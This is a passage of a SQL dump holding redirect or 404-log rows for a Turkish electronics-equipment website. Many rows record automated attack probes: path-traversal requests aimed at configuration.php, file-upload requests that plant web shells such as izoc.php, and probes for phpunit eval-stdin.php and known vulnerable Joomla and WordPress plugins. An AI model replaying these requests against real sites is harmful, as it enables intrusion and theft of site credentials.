00:00:00',301),(19093,'http://3s-technologies.com.tr/en/?option=com_jwallpapers&task=upload',NULL,'http://3s-technologies.com.tr/index.php?option=com_jwallpapers&task=upload','',2,0,'2018-03-20 08:39:31','0000-00-00 00:00:00',301),(19094,'http://www.3s-technologies.com.tr/tr/products-en',NULL,'','',8,0,'2018-03-21 23:16:18','0000-00-00 00:00:00',301),(19095,'http://3s-technologies.com.tr/assets/images/search.php',NULL,'','',13,0,'2018-03-21 23:34:53','0000-00-00 00:00:00',301),(19096,'http://3s-technologies.com.tr/wp-dbs.php',NULL,'','',1,0,'2018-03-21 23:37:04','0000-00-00 00:00:00',301),(19097,'http://3s-technologies.com.tr/wp-content/themes/sketch/404.php',NULL,'','',1,0,'2018-03-21 23:38:59','0000-00-00 00:00:00',301),(19098,'http://3s-technologies.com.tr/function-sync.php',NULL,'','',1,0,'2018-03-21 23:43:33','0000-00-00 00:00:00',301),(19099,'http://3s-technologies.com.tr/wp-content/plugins/background-image-cropper/image/ico/search.php',NULL,'','',1,0,'2018-03-21 23:52:02','0000-00-00 00:00:00',301),(19100,'http://3s-technologies.com.tr/an.php',NULL,'','',1,0,'2018-03-21 23:58:43','0000-00-00 00:00:00',301),(19101,'http://3s-technologies.com.tr/wp-content/themes/gaukingo/db.php',NULL,'','',1,0,'2018-03-22 00:08:23','0000-00-00 00:00:00',301),(19102,'http://www.3s-technologies.com.tr/en/?option=com_adsmanager&task=upload&tmpl=component',NULL,'http://www.3s-technologies.com.tr/index.php?option=com_adsmanager&task=upload&tmpl=component','',4,0,'2018-03-22 01:30:32','0000-00-00 00:00:00',301),(19103,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,product_name',NULL,'','',1,0,'2018-03-22 02:44:48','0000-00-00 00:00:00',301),(19104,'https://www.3s-technologies.com.tr/index.php/en/products/lfs-1-detail?tmpl=component&print=1',NULL,'','',2,0,'2018-03-22 03:13:32','0000-00-00 00:00:00',301),(19105,'http://3s-technologies.com.tr/tr/assets/super_admin/vendor/jquery-file-upload/server/php',NULL,'http://3s-technologies.com.tr/tr/assets/super_admin/vendor/jquery-file-upload/server/php','',1,0,'2018-03-22 04:12:04','0000-00-00 00:00:00',301),(19106,'http://3s-technologies.com.tr/en/assets/super_admin/vendor/jquery-file-upload/server/php',NULL,'http://3s-technologies.com.tr/assets/super_admin/vendor/jquery-file-upload/server/php','',4,0,'2018-03-22 07:27:25','0000-00-00 00:00:00',301),(19107,'http://3s-technologies.com.tr/tr/components/com_b2jcontact/css/b2jcontact.css',NULL,'','',4,0,'2018-03-22 09:05:52','0000-00-00 00:00:00',301),(19108,'http://3s-technologies.com.tr/tr/cfg-contactform-1/inc/upload.php',NULL,'http://3s-technologies.com.tr/tr/cfg-contactform-1/inc/upload.php','',1,0,'2018-03-22 17:12:18','0000-00-00 00:00:00',301),(19109,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku',NULL,'','',1,0,'2018-03-22 18:17:24','0000-00-00 00:00:00',301),(19110,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,pc.ordering,product_name',NULL,'','',5,0,'2018-03-22 18:22:06','0000-00-00 00:00:00',301),(19111,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/dirdesc/results,1-5',NULL,'','',1,0,'2018-03-22 18:40:53','0000-00-00 00:00:00',301),(19112,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/dirdesc/results,1-20',NULL,'','',3,0,'2018-03-22 18:56:11','0000-00-00 00:00:00',301),(19113,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/dirdesc/results,1-10',NULL,'','',5,0,'2018-03-22 20:33:40','0000-00-00 00:00:00',301),(19114,'http://3s-technologies.com.tr/en/cfg-contactform-1/inc/upload.php',NULL,'http://3s-technologies.com.tr/cfg-contactform-1/inc/upload.php','',1,0,'2018-03-22 20:49:18','0000-00-00 00:00:00',301),(19115,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/dirdesc/results,1-50',NULL,'','',3,0,'2018-03-22 21:51:55','0000-00-00 00:00:00',301),(19116,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,mf_name/results,1-5',NULL,'','',4,0,'2018-03-22 23:57:08','0000-00-00 00:00:00',301),(19117,'http://3s-technologies.com.tr/wp-admin/admin-ajax.php',NULL,'','',38,0,'2018-03-23 05:37:16','0000-00-00 00:00:00',301),(19118,'http://3s-technologies.com.tr/wp/wp-admin/admin-ajax.php',NULL,'','',2,0,'2018-03-23 05:37:17','0000-00-00 00:00:00',301),(19119,'http://3s-technologies.com.tr/wordpress/wp-admin/admin-ajax.php',NULL,'','',2,0,'2018-03-23 05:37:17','0000-00-00 00:00:00',301),(19120,'http://3s-technologies.com.tr/blog/wp-admin/admin-ajax.php',NULL,'','',2,0,'2018-03-23 05:37:17','0000-00-00 00:00:00',301),(19121,'http://3s-technologies.com.tr/tr/?option=com_easybookreloaded',NULL,'http://3s-technologies.com.tr/tr/?option=com_easybookreloaded','',5,0,'2018-03-24 17:57:41','0000-00-00 00:00:00',301),(19122,'http://3s-technologies.com.tr/tr/?option=com_vitabook',NULL,'http://3s-technologies.com.tr/tr/?option=com_vitabook','',5,0,'2018-03-25 08:37:30','0000-00-00 00:00:00',301),(19123,'https://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/am100-detail',NULL,'','',1,0,'2018-03-25 23:00:00','0000-00-00 00:00:00',301),(19124,'http://www.3s-technologies.com.tr/en/wp-content/themes/satoshi/upload-file.php',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/satoshi/upload-file.php','',5,0,'2018-03-26 02:30:55','0000-00-00 00:00:00',301),(19125,'http://3s-technologies.com.tr/rpc2',NULL,'','',1,0,'2018-03-26 03:51:22','0000-00-00 00:00:00',301),(19126,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,ordering/results,1-5',NULL,'','',1,0,'2018-03-26 05:19:55','0000-00-00 00:00:00',301),(19127,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/by,category_name/results,1-50',NULL,'','',2,0,'2018-03-26 06:59:48','0000-00-00 00:00:00',301),(19128,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,mf_name/results,1-50',NULL,'','',3,0,'2018-03-26 09:06:39','0000-00-00 00:00:00',301),(19129,'http://3s-technologies.com.tr/tr/me.php',NULL,'','',4,0,'2018-03-26 10:01:22','0000-00-00 00:00:00',301),(19130,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,mf_name/results,1-20',NULL,'','',4,0,'2018-03-26 10:31:21','0000-00-00 00:00:00',301),(19131,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,mf_name/results,1-10',NULL,'','',2,0,'2018-03-26 12:17:14','0000-00-00 00:00:00',301),(19132,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,ordering/results,1-50',NULL,'','',1,0,'2018-03-26 14:45:29','0000-00-00 00:00:00',301),(19133,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,mf_name/results,1-20',NULL,'','',3,0,'2018-03-26 15:06:38','0000-00-00 00:00:00',301),(19134,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,ordering/results,1-20',NULL,'','',1,0,'2018-03-26 15:48:59','0000-00-00 00:00:00',301),(19135,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,pc.ordering,product_name',NULL,'','',1,0,'2018-03-26 16:52:30','0000-00-00 00:00:00',301),(19136,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,ordering/results,1-20',NULL,'','',1,0,'2018-03-26 17:13:41','0000-00-00 00:00:00',301),(19137,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,ordering/results,1-50',NULL,'','',1,0,'2018-03-26 18:41:12','0000-00-00 00:00:00',301),(19138,'http://3s-technologies.com.tr/tr/?option=com_phocaguestbook&id=1',NULL,'http://3s-technologies.com.tr/tr/?option=com_phocaguestbook&id=1','',5,0,'2018-03-26 20:23:03','0000-00-00 00:00:00',301),(19139,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,ordering/results,1-10',NULL,'','',4,0,'2018-03-26 20:41:12','0000-00-00 00:00:00',301),(19140,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,ordering/results,1-10',NULL,'','',1,0,'2018-03-26 22:17:13','0000-00-00 00:00:00',301),(19141,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,product_sku/results,1-5',NULL,'','',1,0,'2018-03-27 02:17:11','0000-00-00 00:00:00',301),(19142,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,product_sku/results,1-20',NULL,'','',2,0,'2018-03-27 04:17:11','0000-00-00 00:00:00',301),(19143,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,product_name/results,1-5',NULL,'','',4,0,'2018-03-27 07:29:10','0000-00-00 00:00:00',301),(19144,'http://www.3s-technologies.com.tr/en/wp-content/plugins/cherry-plugin/readme.md',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/cherry-plugin/README.md','',1,0,'2018-03-27 09:30:52','0000-00-00 00:00:00',301),(19145,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,product_sku/results,1-20',NULL,'','',1,0,'2018-03-27 16:00:44','0000-00-00 00:00:00',301),(19146,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,product_sku/results,1-50',NULL,'','',1,0,'2018-03-27 22:48:41','0000-00-00 00:00:00',301),(19147,'http://www.3s-technologies.com.tr/en/products/manufacturer/',NULL,'','',40,0,'2018-03-27 22:55:31','0000-00-00 00:00:00',301),(19148,'http://3s-technologies.com.tr/tr/?option=com_akobook',NULL,'http://3s-technologies.com.tr/tr/?option=com_akobook','',5,0,'2018-03-27 23:02:42','0000-00-00 00:00:00',301),(19149,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,category_name/results,1-5',NULL,'','',1,0,'2018-03-28 00:03:08','0000-00-00 00:00:00',301),(19150,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/results,1-5',NULL,'','',1,0,'2018-03-28 00:59:23','0000-00-00 00:00:00',301),(19151,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,product_sku/results,1-10',NULL,'','',5,0,'2018-03-28 01:44:23','0000-00-00 00:00:00',301),(19152,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,category_name/results,1-20',NULL,'','',1,0,'2018-03-28 03:03:07','0000-00-00 00:00:00',301),(19153,'http://www.3s-technologies.com.tr/tr/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2018-03-28 03:13:45','0000-00-00 00:00:00',301),(19154,'http://www.3s-technologies.com.tr/tr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'','',2,0,'2018-03-28 03:13:46','0000-00-00 00:00:00',301),(19155,'http://www.3s-technologies.com.tr/tr/joomla/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2018-03-28 03:13:46','0000-00-00 00:00:00',301),(19156,'http://www.3s-technologies.com.tr/tr/joomla/images/stories/explore.php?baca',NULL,'','',5,0,'2018-03-28 03:13:48','0000-00-00 00:00:00',301),(19157,'http://www.3s-technologies.com.tr/tr/images/stories/mild.gif',NULL,'','',6,0,'2018-03-28 03:13:57','0000-00-00 00:00:00',301),(19158,'http://www.3s-technologies.com.tr/tr/joomla/images/stories/mild.gif',NULL,'','',5,0,'2018-03-28 03:13:57','0000-00-00 00:00:00',301),(19159,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,product_name/results,1-10',NULL,'','',8,0,'2018-03-28 03:14:22','0000-00-00 00:00:00',301),(19160,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name/results,1-50',NULL,'','',1,0,'2018-03-28 04:44:22','0000-00-00 00:00:00',301),(19161,'http://3s-technologies.com.tr/tr/components/com_facileforms/libraries/jquery/uploadify.php',NULL,'http://3s-technologies.com.tr/tr/components/com_facileforms/libraries/jquery/uploadify.php','',45,0,'2018-03-28 05:27:43','0000-00-00 00:00:00',301),(19162,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,product_name/results,1-20',NULL,'','',1,0,'2018-03-28 05:29:22','0000-00-00 00:00:00',301),(19163,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,product_name/results,1-20',NULL,'','',3,0,'2018-03-28 07:44:22','0000-00-00 00:00:00',301),(19164,'http://3s-technologies.com.tr/en/components/com_facileforms/libraries/jquery/uploadify.php',NULL,'http://3s-technologies.com.tr/components/com_facileforms/libraries/jquery/uploadify.php','',8,0,'2018-03-28 09:02:53','0000-00-00 00:00:00',301),(19165,'http://3s-technologies.com.tr/en/products/smd-düşük-hızlı/results,1-5',NULL,'','',1,0,'2018-03-28 09:51:58','0000-00-00 00:00:00',301),(19166,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,product_name/results,1-50',NULL,'','',3,0,'2018-03-28 09:59:21','0000-00-00 00:00:00',301),(19167,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku/results,1-5',NULL,'','',1,0,'2018-03-28 11:27:06','0000-00-00 00:00:00',301),(19168,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/by,category_name/results,1-30?error=404',NULL,'','',7,0,'2018-03-28 12:03:06','0000-00-00 00:00:00',301),(19169,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku/results,1-20',NULL,'','',1,0,'2018-03-28 13:06:06','0000-00-00 00:00:00',301),(19170,'http://www.3s-technologies.com.tr/en/components/com_foxcontact/index.html',NULL,'http://www.3s-technologies.com.tr/components/com_foxcontact/index.html','',1,0,'2018-03-28 15:15:53','0000-00-00 00:00:00',301),(19171,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku/results,1-10',NULL,'','',1,0,'2018-03-28 15:39:05','0000-00-00 00:00:00',301),(19172,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku/results,1-20',NULL,'','',6,0,'2018-03-28 17:45:05','0000-00-00 00:00:00',301),(19173,'http://3s-technologies.com.tr/tr//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'','',3,0,'2018-03-28 18:16:13','0000-00-00 00:00:00',301),(19174,'http://3s-technologies.com.tr/tr//media/error.php',NULL,'','',1,0,'2018-03-28 18:16:20','0000-00-00 00:00:00',301),(19175,'http://3s-technologies.com.tr/tr//index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'','',1,0,'2018-03-28 18:16:27','0000-00-00 00:00:00',301),(19176,'http://3s-technologies.com.tr/tr//error.php',NULL,'','',1,0,'2018-03-28 18:16:32','0000-00-00 00:00:00',301),(19177,'http://3s-technologies.com.tr/tr//index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&itemid=138&qqfile=/../../izoc.php',NULL,'','',1,0,'2018-03-28 18:16:37','0000-00-00 00:00:00',301),(19178,'http://3s-technologies.com.tr/tr//components/com_b2jcontact/izoc.php',NULL,'','',1,0,'2018-03-28 18:16:42','0000-00-00 00:00:00',301),(19179,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku/results,1-50',NULL,'','',1,0,'2018-03-28 19:42:04','0000-00-00 00:00:00',301),(19180,'http://www.3s-technologies.com.tr/en/products/manufacturer/screen-printer/by,`p`.product_sku/results,1-5',NULL,'','',1,0,'2018-03-28 20:00:05','0000-00-00 00:00:00',301),(19181,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,ordering/results,1-50?language=en-gb',NULL,'','',1,0,'2018-03-28 20:45:05','0000-00-00 00:00:00',301),(19182,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,pc.ordering,product_name/results,1-5',NULL,'','',5,0,'2018-03-28 21:03:04','0000-00-00 00:00:00',301),(19183,'http://3s-technologies.com.tr/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',16,0,'2018-03-28 22:14:19','0000-00-00 00:00:00',301),(19184,'http://3s-technologies.com.tr/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',3,0,'2018-03-28 22:14:19','0000-00-00 00:00:00',301),(19185,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,pc.ordering,product_name/results,1-5',NULL,'','',3,0,'2018-03-28 22:31:29','0000-00-00 00:00:00',301),(19186,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,pc.ordering,product_name/results,1-50',NULL,'','',1,0,'2018-03-29 00:11:10','0000-00-00 00:00:00',301),(19187,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,pc.ordering,product_name/results,1-10',NULL,'','',2,0,'2018-03-29 01:34:15','0000-00-00 00:00:00',301),(19188,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,pc.ordering,product_name/results,1-50',NULL,'','',1,0,'2018-03-29 03:25:00','0000-00-00 00:00:00',301),(19189,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,pc.ordering,product_name/results,1-10',NULL,'','',1,0,'2018-03-29 04:06:32','0000-00-00 00:00:00',301),(19190,'http://3s-technologies.com.tr//index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&itemid=138&qqfile=/../../me.php',NULL,'','',3,0,'2018-03-29 04:44:16','0000-00-00 00:00:00',301),(19191,'http://3s-technologies.com.tr/tr/components/com_b2jcontact/me.php',NULL,'','',3,0,'2018-03-29 04:44:36','0000-00-00 00:00:00',301),(19192,'http://3s-technologies.com.tr/tr/?option=com_community',NULL,'http://3s-technologies.com.tr/tr/?option=com_community','',2,0,'2018-03-29 05:14:18','0000-00-00 00:00:00',301),(19193,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,pc.ordering,product_name/results,1-20',NULL,'','',4,0,'2018-03-29 05:43:27','0000-00-00 00:00:00',301),(19194,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,pc.ordering,product_name/results,1-20',NULL,'','',4,0,'2018-03-29 07:34:13','0000-00-00 00:00:00',301),(19195,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/results,1-5',NULL,'','',4,0,'2018-03-29 11:43:26','0000-00-00 00:00:00',301),(19196,'http://www.3s-technologies.com.tr/tr/?option=com_user&view=login',NULL,'http://www.3s-technologies.com.tr/index.php?option=com_user&view=login','',2,0,'2018-03-29 13:25:13','0000-00-00 00:00:00',301),(19197,'http://3s-technologies.com.tr/tr/media/error.php',NULL,'','',11,0,'2018-03-29 18:51:16','0000-00-00 00:00:00',301),(19198,'http://3s-technologies.com.tr/tr/components/com_b2jcontact/izoc.php',NULL,'','',60,0,'2018-03-29 18:51:31','0000-00-00 00:00:00',301),(19199,'http://3s-technologies.com.tr/tr/administrator/index.php',NULL,'','',24,0,'2018-03-29 19:48:12','0000-00-00 00:00:00',301),(19200,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions/components/content-component/images/stories/explore.php?baca',NULL,'','',1,0,'2018-03-29 20:04:52','0000-00-00 00:00:00',301),(19201,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions/components/content-component/article-category-list//images/stories/mild.gif',NULL,'','',1,0,'2018-03-29 20:04:54','0000-00-00 00:00:00',301),(19202,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions/components/content-component//images/stories/mild.gif',NULL,'','',1,0,'2018-03-29 20:05:02','0000-00-00 00:00:00',301),(19203,'http://www.3s-technologies.com.tr/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=158&itemid=158&qqfile=/../../template.php',NULL,'','',1,0,'2018-03-29 21:45:31','0000-00-00 00:00:00',301),(19204,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,product_name/results,1-10',NULL,'','',3,0,'2018-03-30 01:25:05','0000-00-00 00:00:00',301),(19205,'http://3s-technologies.com.tr/tr/modules/namamodule/uploadimage.php',NULL,'http://3s-technologies.com.tr/tr/modules/namamodule/uploadimage.php','',1,0,'2018-03-30 05:35:01','0000-00-00 00:00:00',301),(19206,'http://3s-technologies.com.tr/en/modules/namamodule/uploadimage.php',NULL,'http://3s-technologies.com.tr/modules/namamodule/uploadimage.php','',1,0,'2018-03-30 09:29:50','0000-00-00 00:00:00',301),(19207,'http://www.3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/udd.php',NULL,'','',18,0,'2018-03-30 09:34:11','0000-00-00 00:00:00',301),(19208,'http://www.3s-technologies.com.tr/en/wp-content/themes/u-design/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/u-design/style.css','',5,0,'2018-03-30 11:04:43','0000-00-00 00:00:00',301),(19209,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/results,1-50',NULL,'','',4,0,'2018-03-31 04:11:16','0000-00-00 00:00:00',301),(19210,'http://3s-technologies.com.tr/tr/modules/columnadverts/uploadimage.php',NULL,'http://3s-technologies.com.tr/tr/modules/columnadverts/uploadimage.php','',1,0,'2018-03-31 04:15:20','0000-00-00 00:00:00',301),(19211,'http://3s-technologies.com.tr/en/modules/columnadverts/uploadimage.php',NULL,'http://3s-technologies.com.tr/modules/columnadverts/uploadimage.php','',1,0,'2018-03-31 07:37:18','0000-00-00 00:00:00',301),(19212,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/dirdesc/results,1-10',NULL,'','',4,0,'2018-03-31 12:48:26','0000-00-00 00:00:00',301),(19213,'http://3s-technologies.com.tr/tr/rxr.php?rxr',NULL,'','',8,0,'2018-03-31 13:18:40','0000-00-00 00:00:00',301),(19214,'http://3s-technologies.com.tr/tr/images/jdownloads/screenshots/rxrking.php3.g?rxr',NULL,'','',5,0,'2018-03-31 13:18:43','0000-00-00 00:00:00',301),(19215,'http://3s-technologies.com.tr/tr/components/com_jbcatalog/libraries/jsupload',NULL,'','',5,0,'2018-03-31 13:18:44','0000-00-00 00:00:00',301),(19216,'http://3s-technologies.com.tr/tr/components/rxr_152246054.php',NULL,'','',1,0,'2018-03-31 13:18:45','0000-00-00 00:00:00',301),(19217,'http://3s-technologies.com.tr/tr/?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',7,0,'2018-03-31 13:18:47','0000-00-00 00:00:00',301),(19218,'http://3s-technologies.com.tr/tr/?option=com_myblog&task=ajaxupload',NULL,'','',9,0,'2018-03-31 13:18:48','0000-00-00 00:00:00',301),(19219,'http://3s-technologies.com.tr/tr/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',49,0,'2018-03-31 13:18:49','0000-00-00 00:00:00',301),(19220,'http://3s-technologies.com.tr/tr/?option=com_macgallery&view=download&albumid=../../configuration.php',NULL,'','',33,0,'2018-03-31 13:18:50','0000-00-00 00:00:00',301),(19221,'http://3s-technologies.com.tr/tr/?option=com_jtagmembersdirectory&task=attachment&download_file=/../../../../configuration.php',NULL,'','',5,0,'2018-03-31 13:18:55','0000-00-00 00:00:00',301),(19222,'http://3s-technologies.com.tr/tr/?option=com_facegallery&task=imagedownload&img_name=../../configuration.php',NULL,'','',4,0,'2018-03-31 13:18:56','0000-00-00 00:00:00',301),(19223,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,mf_name/results,1-5',NULL,'','',5,0,'2018-04-01 05:22:20','0000-00-00 00:00:00',301),(19224,'http://www.3s-technologies.com.tr/en/wp-content/themes/dailydeal/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/DailyDeal/style.css','',1,0,'2018-04-01 09:06:43','0000-00-00 00:00:00',301),(19225,'http://www.3s-technologies.com.tr/en/wp-content/plugins/page-flip-image-gallery/readme.txt',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/page-flip-image-gallery/readme.txt','',1,0,'2018-04-01 10:44:39','0000-00-00 00:00:00',301),(19226,'http://www.3s-technologies.com.tr/en/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&itemid=138&qqfile=/../../izoc.php',NULL,'http://www.3s-technologies.com.tr/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../izoc.php','',1,0,'2018-04-01 18:33:44','0000-00-00 00:00:00',301),(19227,'http://3s-technologies.com.tr/en//?es=subscribe',NULL,'http://3s-technologies.com.tr/en/','',1,0,'2018-04-01 20:08:31','0000-00-00 00:00:00',301),(19228,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,mf_name/results,1-10',NULL,'','',7,0,'2018-04-02 02:29:45','0000-00-00 00:00:00',301),(19229,'http://www.3s-technologies.com.tr/en/wp-content/themes/sandbox/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/sandbox/style.css','',1,0,'2018-04-02 11:25:37','0000-00-00 00:00:00',301),(19230,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,mf_name/dirdesc/results,1-5?language=en-gb',NULL,'','',5,0,'2018-04-02 12:06:42','0000-00-00 00:00:00',301),(19231,'http://www.3s-technologies.com.tr/en/wp-content/plugins/font-uploader/readme.txt',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/font-uploader/readme.txt','',3,0,'2018-04-03 08:40:45','0000-00-00 00:00:00',301),(19232,'http://3s-technologies.com.tr/tr/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.css',NULL,'http://3s-technologies.com.tr/tr/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.css','',1,0,'2018-04-03 10:00:21','0000-00-00 00:00:00',301),(19233,'http://3s-technologies.com.tr/tr/themes/zicepanel/components/uploadify/uploadify.css',NULL,'http://3s-technologies.com.tr/tr/themes/zicepanel/components/uploadify/uploadify.css','',1,0,'2018-04-03 10:00:21','0000-00-00 00:00:00',301),(19234,'http://www.3s-technologies.com.tr/en/products/thru-hole/results,1-20',NULL,'','',1,0,'2018-04-03 10:41:07','0000-00-00 00:00:00',301),(19235,'http://3s-technologies.com.tr/en/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.css','',1,0,'2018-04-03 13:04:41','0000-00-00 00:00:00',301),(19236,'http://3s-technologies.com.tr/en/themes/zicepanel/components/uploadify/uploadify.css',NULL,'http://3s-technologies.com.tr/themes/zicepanel/components/uploadify/uploadify.css','',1,0,'2018-04-03 13:04:46','0000-00-00 00:00:00',301),(19237,'http://www.3s-technologies.com.tr/tr/inc/upload.php',NULL,'','',1,0,'2018-04-03 15:05:25','0000-00-00 00:00:00',301),(19238,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/content-component/article-category-list/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',1,0,'2018-04-03 15:05:40','0000-00-00 00:00:00',301),(19239,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/components/content-component/article-category-list/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=mil.php',NULL,'','',1,0,'2018-04-03 15:05:44','0000-00-00 